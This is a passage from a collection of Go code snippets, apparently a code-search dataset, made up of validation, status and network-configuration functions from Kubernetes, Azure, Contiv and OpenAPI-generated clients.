time.Second)\n\t}\n}", "func (o *IpamNetworkDataData) GetNetworkIsValid() string {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.NetworkIsValid\n}", "func validateExternalNetwork(ctx context.Context, cli client.Client, externalNetwork string) error {\n\tinstance := &crdv1.ExternalNetwork{}\n\tkey := types.NamespacedName{Name: externalNetwork}\n\terr := cli.Get(ctx, key, instance)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (m *RecoveryPlanNetworkInfo) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateNetworkMapping(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStaticIPAssignment(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func validNetwork(i string) bool {\n\t_, _, err := net.ParseCIDR(i)\n\tif err == nil {\n\t\treturn true\n\t}\n\tif net.ParseIP(i) != nil {\n\t\treturn true\n\t}\n\treturn false\n}", "func checkCreateNetwork(t *testing.T, expError bool, tenant, network, encap, subnet, gw string, tag int) {\n\tnet := client.Network{\n\t\tTenantName: tenant,\n\t\tNetworkName: network,\n\t\tEncap: encap,\n\t\tSubnet: subnet,\n\t\tGateway: gw,\n\t\tPktTag: tag,\n\t}\n\terr := contivClient.NetworkPost(&net)\n\tif err != nil && !expError {\n\t\tt.Fatalf(\"Error creating network {%+v}. Err: %v\", net, err)\n\t} else if err == nil && expError {\n\t\tt.Fatalf(\"Create network {%+v} succeded while expecing error\", net)\n\t} else if err == nil {\n\t\t// verify network is created\n\t\t_, err := contivClient.NetworkGet(tenant, network)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Error getting network %s/%s. Err: %v\", tenant, network, err)\n\t\t}\n\t}\n}", "func (network *VirtualNetwork) GetStatus() genruntime.ConvertibleStatus {\n\treturn &network.Status\n}", "func (m *DeviceInterfaceConnectionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateLabel(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValue(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func IsValidStatus(status string) bool {\n\treturn status == StatusRunning ||\n\t\tstatus == StatusQueued ||\n\t\tstatus == StatusNeedsRetry ||\n\t\tstatus == StatusPending ||\n\t\tstatus == StatusStopped\n}", "func verifyNetworkState(t *testing.T, tenant, network, encap, subnet, gw string, subnetLen uint, pktTag, extTag int) {\n\tnetworkID := network + \".\" + tenant\n\tnwCfg := &mastercfg.CfgNetworkState{}\n\tnwCfg.StateDriver = stateStore\n\terr := nwCfg.Read(networkID)\n\tif err != nil {\n\t\tt.Fatalf(\"Network state for %s not found. Err: %v\", networkID, err)\n\t}\n\n\t// verify network params\n\tif nwCfg.Tenant != tenant || nwCfg.NetworkName != network ||\n\t\tnwCfg.PktTagType != encap || nwCfg.SubnetIP != netutils.GetSubnetAddr(subnet, subnetLen) || nwCfg.Gateway != gw {\n\t\tt.Fatalf(\"Network state {%+v} did not match expected state\", nwCfg)\n\t}\n\n\t// verify network tags\n\tif (pktTag != 0 && nwCfg.PktTag != pktTag) ||\n\t\t(extTag != 0 && nwCfg.ExtPktTag != extTag) {\n\t\tt.Fatalf(\"Network tags %d/%d did not match expected %d/%d\",\n\t\t\tnwCfg.PktTag, nwCfg.ExtPktTag, pktTag, extTag)\n\t}\n}", "func (m *GrpcStatus) Validate() error {\n\tif m == nil {\n\t\treturn nil\n\t}\n\n\t// no validation rules for Status\n\n\treturn nil\n}", "func ValidateNetworks(Validations Validations, Service types.ServiceConfig) error {\n\tfor Network := range Service.Networks {\n\t\tif !goutil.StringInSlice(Network, Validations.Networks) {\n\t\t\treturn fmt.Errorf(\"Network '%s' not in the whitelist\", Network)\n\t\t}\n\t}\n\treturn nil\n}", "func (m *NetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (r *NetworkReconciler) updateStatus(network *ethereumv1alpha1.Network) error {\n\tnetwork.Status.NodesCount = len(network.Spec.Nodes)\n\n\tif err := r.Status().Update(context.Background(), network); err != nil {\n\t\tr.Log.Error(err, \"unable to update network status\")\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func StatusValidator(s Status) error {\n\tswitch s {\n\tcase StatusWAITING, StatusIN_PROGRESS, StatusDONE, StatusERROR:\n\t\treturn nil\n\tdefault:\n\t\treturn fmt.Errorf(\"operation: invalid enum value for status field: %q\", s)\n\t}\n}", "func (in *NetworkStatus) DeepCopy() *NetworkStatus {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(NetworkStatus)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func validateNetworkInputs(p netintents.Network) error {\n\t// validate name\n\terrs := validation.IsValidName(p.Metadata.Name)\n\tif len(errs) > 0 {\n\t\treturn pkgerrors.Errorf(\"Invalid network name - name=[%v], errors: %v\", p.Metadata.Name, errs)\n\t}\n\n\t// validate cni type\n\tfound := false\n\tfor _, val := range nettypes.CNI_TYPES {\n\t\tif p.Spec.CniType == val {\n\t\t\tfound = true\n\t\t\tbreak\n\t\t}\n\t}\n\tif !found {\n\t\treturn pkgerrors.Errorf(\"Invalid cni type: %v\", p.Spec.CniType)\n\t}\n\n\tsubnets := p.Spec.Ipv4Subnets\n\tfor _, subnet := range subnets {\n\t\terr := nettypes.ValidateSubnet(subnet)\n\t\tif err != nil {\n\t\t\treturn pkgerrors.Wrap(err, \"invalid subnet\")\n\t\t}\n\t}\n\treturn nil\n}", "func (w *WithdrawalNetwork) Valid() bool {\n\tswitch *w {\n\tcase \"local\", \"remote\":\n\t\treturn true\n\tdefault:\n\t\treturn false\n\t}\n}", "func ValidateStatusRequest(message *taskspb.StatusRequest) (err error) {\n\tif !(message.Status == \"Open\" || message.Status == \"Closed\" || message.Status == \"Pending\") {\n\t\terr = goa.MergeErrors(err, goa.InvalidEnumValueError(\"message.status\", message.Status, []interface{}{\"Open\", \"Closed\", \"Pending\"}))\n\t}\n\treturn\n}", "func IsNetworkUnavailable(n *corev1.Node) bool {\n\treturn ConditionStatus(n, corev1.NodeNetworkUnavailable) == corev1.ConditionTrue\n}", "func (n NetworkConfig) validate() error {\n\tif n.IsEmpty() {\n\t\treturn nil\n\t}\n\tif err := n.VPC.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"vpc\": %w`, err)\n\t}\n\tif err := n.Connect.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"connect\": %w`, err)\n\t}\n\treturn nil\n}", "func (m *OperationV1Status) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateFailure(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateOperationID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateOperationType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSuccess(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *NetworkResource) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPAM(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIndexConfigs(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *PortStatusDTO) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateAggregateSnapshot(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateNodeSnapshots(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRunStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func Validate(name string, netType string, config map[string]string) error {\n\tdriverFunc, ok := drivers[netType]\n\tif !ok {\n\t\treturn ErrUnknownDriver\n\t}\n\n\tn := driverFunc()\n\tn.init(nil, 0, name, netType, \"\", config, \"Unknown\")\n\n\terr := n.ValidateName(name)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Network name invalid\")\n\t}\n\n\treturn n.Validate(config)\n}", "func (m *ManagerNetworkProtocol100ManagerNetworkProtocol) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateHTTP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateHTTPS(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIPMI(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateKVMIP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSNMP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSSDP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSSH(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTelnet(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateVirtualMedia(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *NetStatusIPGroup) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (ps PoolStatus) Valid() error {\n\tif ps.String() == \"\" {\n\t\treturn errors.New(\"invalid pool status\")\n\t}\n\treturn nil\n}", "func (m *PortNetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (c *networkConfiguration) Validate() error {\n\tif c.Mtu < 0 {\n\t\treturn ErrInvalidMtu(c.Mtu)\n\t}\n\n\t// If bridge v4 subnet is specified\n\tif c.AddressIPv4 != nil {\n\t\t// If default gw is specified, it must be part of bridge subnet\n\t\tif c.DefaultGatewayIPv4 != nil {\n\t\t\tif !c.AddressIPv4.Contains(c.DefaultGatewayIPv4) {\n\t\t\t\treturn &ErrInvalidGateway{}\n\t\t\t}\n\t\t}\n\t}\n\n\t// If default v6 gw is specified, AddressIPv6 must be specified and gw must belong to AddressIPv6 subnet\n\tif c.EnableIPv6 && c.DefaultGatewayIPv6 != nil {\n\t\tif c.AddressIPv6 == nil || !c.AddressIPv6.Contains(c.DefaultGatewayIPv6) {\n\t\t\treturn &ErrInvalidGateway{}\n\t\t}\n\t}\n\treturn nil\n}", "func (network *VirtualNetwork) SetStatus(status genruntime.ConvertibleStatus) error {\n\t// If we have exactly the right type of status, assign it\n\tif st, ok := status.(*VirtualNetwork_STATUS); ok {\n\t\tnetwork.Status = *st\n\t\treturn nil\n\t}\n\n\t// Convert status to required version\n\tvar st VirtualNetwork_STATUS\n\terr := status.ConvertStatusTo(&st)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to convert status\")\n\t}\n\n\tnetwork.Status = st\n\treturn nil\n}", "func IsIPNetValid(nw *net.IPNet) bool {\n\treturn nw.String() != \"0.0.0.0/0\"\n}", "func (m *HttpNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (m *HttpNetworkPolicyRules) Validate() error {\n\treturn m.validate(false)\n}", "func (m Status) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// value enum\n\tif err := m.validateStatusEnum(\"\", \"body\", m); err != nil {\n\t\treturn err\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *Status) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateCreated(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateUpdated(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateCreator(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (ps Pool) EnsureValidPoolStatus(msg cosmos.Msg) error {\n\tswitch ps.Status {\n\tcase Enabled:\n\t\treturn nil\n\tcase Bootstrap:\n\t\tswitch msg.(type) {\n\t\tcase MsgSwap:\n\t\t\treturn errors.New(\"pool is in bootstrap status, can't swap\")\n\t\tdefault:\n\t\t\treturn nil\n\t\t}\n\tcase Suspended:\n\t\treturn errors.New(\"pool suspended\")\n\tdefault:\n\t\treturn fmt.Errorf(\"unknown pool status,%s\", ps.Status)\n\t}\n}", "func (m *NetworkElement) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// validation for a type composition with EquipmentBase\n\tif err := m.EquipmentBase.Validate(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateCards(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateFanmodules(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateManagementContoller(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateManagementEntity(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validatePsus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRegisteredDevice(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTopSystem(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateUcsmRunningFirmware(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (network *VirtualNetwork_STATUS) ConvertStatusFrom(source genruntime.ConvertibleStatus) error {\n\tsrc, ok := source.(*v20201101s.VirtualNetwork_STATUS)\n\tif ok {\n\t\t// Populate our instance from source\n\t\treturn network.AssignProperties_From_VirtualNetwork_STATUS(src)\n\t}\n\n\t// Convert to an intermediate form\n\tsrc = &v20201101s.VirtualNetwork_STATUS{}\n\terr := src.ConvertStatusFrom(source)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"initial step of conversion in ConvertStatusFrom()\")\n\t}\n\n\t// Update our instance from src\n\terr = network.AssignProperties_From_VirtualNetwork_STATUS(src)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"final step of conversion in ConvertStatusFrom()\")\n\t}\n\n\treturn nil\n}", "func (m ValidationStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// value enum\n\tif err := m.validateValidationStatusEnum(\"\", \"body\", m); err != nil {\n\t\treturn err\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *TransactionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *PortNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func checkDeleteNetwork(t *testing.T, expError bool, tenant, network string) {\n\terr := contivClient.NetworkDelete(tenant, network)\n\tif err != nil && !expError {\n\t\tt.Fatalf(\"Error deleting network %s/%s. Err: %v\", tenant, network, err)\n\t} else if err == nil && expError {\n\t\tt.Fatalf(\"Delete network %s/%s succeded while expecing error\", tenant, network)\n\t} else if err == nil {\n\t\t// verify network is gone\n\t\t_, err := contivClient.NetworkGet(tenant, network)\n\t\tif err == nil {\n\t\t\tt.Fatalf(\"Network %s/%s not deleted\", tenant, network)\n\t\t}\n\n\t\t// verify network state is gone too\n\t\tnetworkID := network + \".\" + tenant\n\t\tnwCfg := &mastercfg.CfgNetworkState{}\n\t\tnwCfg.StateDriver = stateStore\n\t\terr = nwCfg.Read(networkID)\n\t\tif err == nil {\n\t\t\tt.Fatalf(\"Network state %s not deleted\", networkID)\n\t\t}\n\t}\n}", "func (m *TaskStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateContainerStatus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateState(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func isValidStatus(o v1Alpha1API.MigrationDetailedStatuses) bool {\n\tif o.Step == \"\" {\n\t\treturn false\n\t}\n\tif o.Phase == \"\" {\n\t\treturn false\n\t}\n\tif o.Message == \"\" && o.Phase != v1Alpha1API.StepWaiting {\n\t\treturn false\n\t}\n\tif o.Reason == \"\" && o.Phase == v1Alpha1API.StepErrored {\n\t\treturn false\n\t}\n\treturn true\n}", "func (o *GetNetworkSharesOKBody) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := o.validateNetworkshareDetails(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (o *NetworkingProjectNetadpCreate) GetNetworkOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Network, true\n}", "func (rule *VirtualNetworkRule) Initialize_From_VirtualNetworkRule_STATUS(source *VirtualNetworkRule_STATUS) error {\n\n\t// IgnoreMissingVNetServiceEndpoint\n\tif source.IgnoreMissingVNetServiceEndpoint != nil {\n\t\tignoreMissingVNetServiceEndpoint := *source.IgnoreMissingVNetServiceEndpoint\n\t\trule.IgnoreMissingVNetServiceEndpoint = &ignoreMissingVNetServiceEndpoint\n\t} else {\n\t\trule.IgnoreMissingVNetServiceEndpoint = nil\n\t}\n\n\t// Reference\n\tif source.Id != nil {\n\t\treference := genruntime.CreateResourceReferenceFromARMID(*source.Id)\n\t\trule.Reference = &reference\n\t} else {\n\t\trule.Reference = nil\n\t}\n\n\t// No error\n\treturn nil\n}", "func (o *IpamNetworkDataData) HasNetworkIsValid() bool {\n\tif o != nil && o.NetworkIsValid != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m TenderCardDetailsStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// value enum\n\tif err := m.validateTenderCardDetailsStatusEnum(\"\", \"body\", m); err != nil {\n\t\treturn err\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *ConnectionStatusSnapshotDTO) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validatePredictions(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (in *ValidationStatus) DeepCopy() *ValidationStatus {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(ValidationStatus)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (e NetEvent) Validate() (bool, error) {\n\tif !e.isValidated {\n\t\tif e.NetDevice == \"\" {\n\t\t\treturn false, fmt.Errorf(\"source device for event not specified\")\n\t\t}\n\t}\n\treturn true, nil\n}", "func (mt *Status) Validate() (err error) {\n\tif mt.Commit == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"commit\"))\n\t}\n\tif mt.BuildTime == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"buildTime\"))\n\t}\n\tif mt.StartTime == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"startTime\"))\n\t}\n\tif mt.DatabaseStatus == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"databaseStatus\"))\n\t}\n\tif mt.ConfigurationStatus == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"configurationStatus\"))\n\t}\n\treturn\n}", "func (m *GitStatus) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (m *TaskStatusContainerStatus) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func StatusValidator(s Status) error {\n\tswitch s {\n\tcase StatusOpen, StatusClose:\n\t\treturn nil\n\tdefault:\n\t\treturn fmt.Errorf(\"ukm: invalid enum value for status field: %q\", s)\n\t}\n}", "func (network *VirtualNetwork) NewEmptyStatus() genruntime.ConvertibleStatus {\n\treturn &VirtualNetwork_STATUS{}\n}", "func StatusValidator(s Status) error {\n\tswitch s {\n\tcase StatusPENDING, StatusPOSTED:\n\t\treturn nil\n\tdefault:\n\t\treturn fmt.Errorf(\"transaction: invalid enum value for status field: %q\", s)\n\t}\n}", "func (m *InterfaceStatus) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func ParseNetwork(network string) (minIp uint32, maxIp uint32, err error) {\n\tip, subnet, err := net.ParseCIDR(network)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ip = ip.To4(); ip == nil || ip[3] == 0 {\n\t\terr = fmt.Errorf(\"invalid network %s\", network)\n\t\treturn\n\t}\n\n\tminIp = Ipv4ToInt(subnet.IP) + 1\n\tmaxIp = minIp + ^Ipv4ToInt(net.IP(subnet.Mask)) - 1\n\n\treturn\n}", "func ValidateNetworkSpecUpdate(new, old *extensionsv1alpha1.NetworkSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) {\n\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...)\n\t\treturn allErrs\n\t}\n\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Type, old.Type, fldPath.Child(\"type\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.PodCIDR, old.PodCIDR, fldPath.Child(\"podCIDR\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.ServiceCIDR, old.ServiceCIDR, fldPath.Child(\"serviceCIDR\"))...)\n\n\treturn allErrs\n}", "func (m *PVMInstanceV2NetworkPort) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPProtocol(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *PVMInstanceNetwork) ContextValidate(ctx context.Context, formats strfmt.Registry) error {\n\treturn nil\n}", "func (in *StatusClusterNetwork) DeepCopy() *StatusClusterNetwork {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(StatusClusterNetwork)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (m *HttpConnectionManager_ProxyStatusConfig) Validate() error {\n\treturn m.validate(false)\n}", "func (s BlockchainStatus) Valid() error {\n\tswitch s {\n\tcase Created, Preferred, Validating, Syncing:\n\t\treturn nil\n\tdefault:\n\t\treturn errUnknownBlockchainStatus\n\t}\n}", "func IsNetworkTimeoutErr(err error) bool {\n\t// if it's a network timeout error\n\topErr, ok := err.(*net.OpError)\n\tif ok {\n\t\treturn opErr.Timeout()\n\t}\n\n\treturn false\n}", "func validateExternalNetwork(p *openstack.Platform, ci *CloudInfo, fldPath *field.Path) (allErrs field.ErrorList) {\n\t// Return an error if external network was specified in the install config, but hasn't been found\n\tif p.ExternalNetwork != \"\" && ci.ExternalNetwork == nil {\n\t\tallErrs = append(allErrs, field.NotFound(fldPath.Child(\"externalNetwork\"), p.ExternalNetwork))\n\t}\n\treturn allErrs\n}", "func (s *ResolverDnssecConfig) SetValidationStatus(v string) *ResolverDnssecConfig {\n\ts.ValidationStatus = &v\n\treturn s\n}", "func (n *Network) ValidateCreate() error {\n\tvar allErrors field.ErrorList\n\n\tnetworklog.Info(\"validate create\", \"name\", n.Name)\n\n\t// shared validation rules with update\n\tallErrors = append(allErrors, n.Validate()...)\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n}", "func (mt *RankdbBackupStatus) Validate() (err error) {\n\n\tif mt.Storage == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"storage\"))\n\t}\n\n\tif mt.URI == \"\" {\n\t\terr = goa.MergeErrors(err, goa.MissingAttributeError(`response`, \"uri\"))\n\t}\n\n\treturn\n}", "func (o *IpamNetworkDataData) GetNetworkMultistatusOk() (*string, bool) {\n\tif o == nil || o.NetworkMultistatus == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetworkMultistatus, true\n}", "func (m *ImageResourcesStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateResources(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTaskReference(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateExternalServiceConnectivity(serviceIP string, port int) error {\n\t// the default nginx port is 80, skip other ports\n\tif port != 80 {\n\t\treturn nil\n\t}\n\n\terr := wait.PollImmediate(pullInterval, pullTimeout, func() (done bool, err error) {\n\t\tresp, err := http.Get(fmt.Sprintf(\"http://%s:%d\", serviceIP, port))\n\t\tif err != nil {\n\t\t\tLogf(\"got error %v, will retry\", err)\n\t\t\treturn false, nil\n\t\t}\n\n\t\tif 200 <= resp.StatusCode && resp.StatusCode < 300 {\n\t\t\tLogf(\"succeeded\")\n\t\t\treturn true, nil\n\t\t}\n\n\t\tLogf(\"got status code %d\", resp.StatusCode)\n\t\treturn false, nil\n\t})\n\n\tLogf(\"validation finished\")\n\treturn err\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) GetNetworkCountOk() (*int64, bool) {\n\tif o == nil || o.NetworkCount == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetworkCount, true\n}", "func (m *AzureManagedControlPlane) validateManagedClusterNetwork(cli client.Client) error {\n\tctx := context.Background()\n\n\t// Fetch the Cluster.\n\tclusterName, ok := m.Labels[clusterv1.ClusterNameLabel]\n\tif !ok {\n\t\treturn nil\n\t}\n\n\townerCluster := &clusterv1.Cluster{}\n\tkey := client.ObjectKey{\n\t\tNamespace: m.Namespace,\n\t\tName: clusterName,\n\t}\n\n\tif err := cli.Get(ctx, key, ownerCluster); err != nil {\n\t\treturn err\n\t}\n\n\tvar (\n\t\tallErrs field.ErrorList\n\t\tserviceCIDR string\n\t)\n\n\tif clusterNetwork := ownerCluster.Spec.ClusterNetwork; clusterNetwork != nil {\n\t\tif clusterNetwork.Services != nil {\n\t\t\t// A user may provide zero or one CIDR blocks. If they provide an empty array,\n\t\t\t// we ignore it and use the default. AKS doesn't support > 1 Service/Pod CIDR.\n\t\t\tif len(clusterNetwork.Services.CIDRBlocks) > 1 {\n\t\t\t\tallErrs = append(allErrs, field.TooMany(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), len(clusterNetwork.Services.CIDRBlocks), 1))\n\t\t\t}\n\t\t\tif len(clusterNetwork.Services.CIDRBlocks) == 1 {\n\t\t\t\tserviceCIDR = clusterNetwork.Services.CIDRBlocks[0]\n\t\t\t}\n\t\t}\n\t\tif clusterNetwork.Pods != nil {\n\t\t\t// A user may provide zero or one CIDR blocks. If they provide an empty array,\n\t\t\t// we ignore it and use the default. AKS doesn't support > 1 Service/Pod CIDR.\n\t\t\tif len(clusterNetwork.Pods.CIDRBlocks) > 1 {\n\t\t\t\tallErrs = append(allErrs, field.TooMany(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Pods\", \"CIDRBlocks\"), len(clusterNetwork.Pods.CIDRBlocks), 1))\n\t\t\t}\n\t\t}\n\t}\n\n\tif m.Spec.DNSServiceIP != nil {\n\t\tif serviceCIDR == \"\" {\n\t\t\tallErrs = append(allErrs, field.Required(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), \"service CIDR must be specified if specifying DNSServiceIP\"))\n\t\t}\n\t\t_, cidr, err := net.ParseCIDR(serviceCIDR)\n\t\tif err != nil {\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), serviceCIDR, fmt.Sprintf(\"failed to parse cluster service cidr: %v\", err)))\n\t\t}\n\n\t\tdnsIP := net.ParseIP(*m.Spec.DNSServiceIP)\n\t\tif dnsIP == nil { // dnsIP will be nil if the string is not a valid IP\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Spec\", \"DNSServiceIP\"), *m.Spec.DNSServiceIP, \"must be a valid IP address\"))\n\t\t}\n\n\t\tif dnsIP != nil && !cidr.Contains(dnsIP) {\n\t\t\tallErrs = append(allErrs, 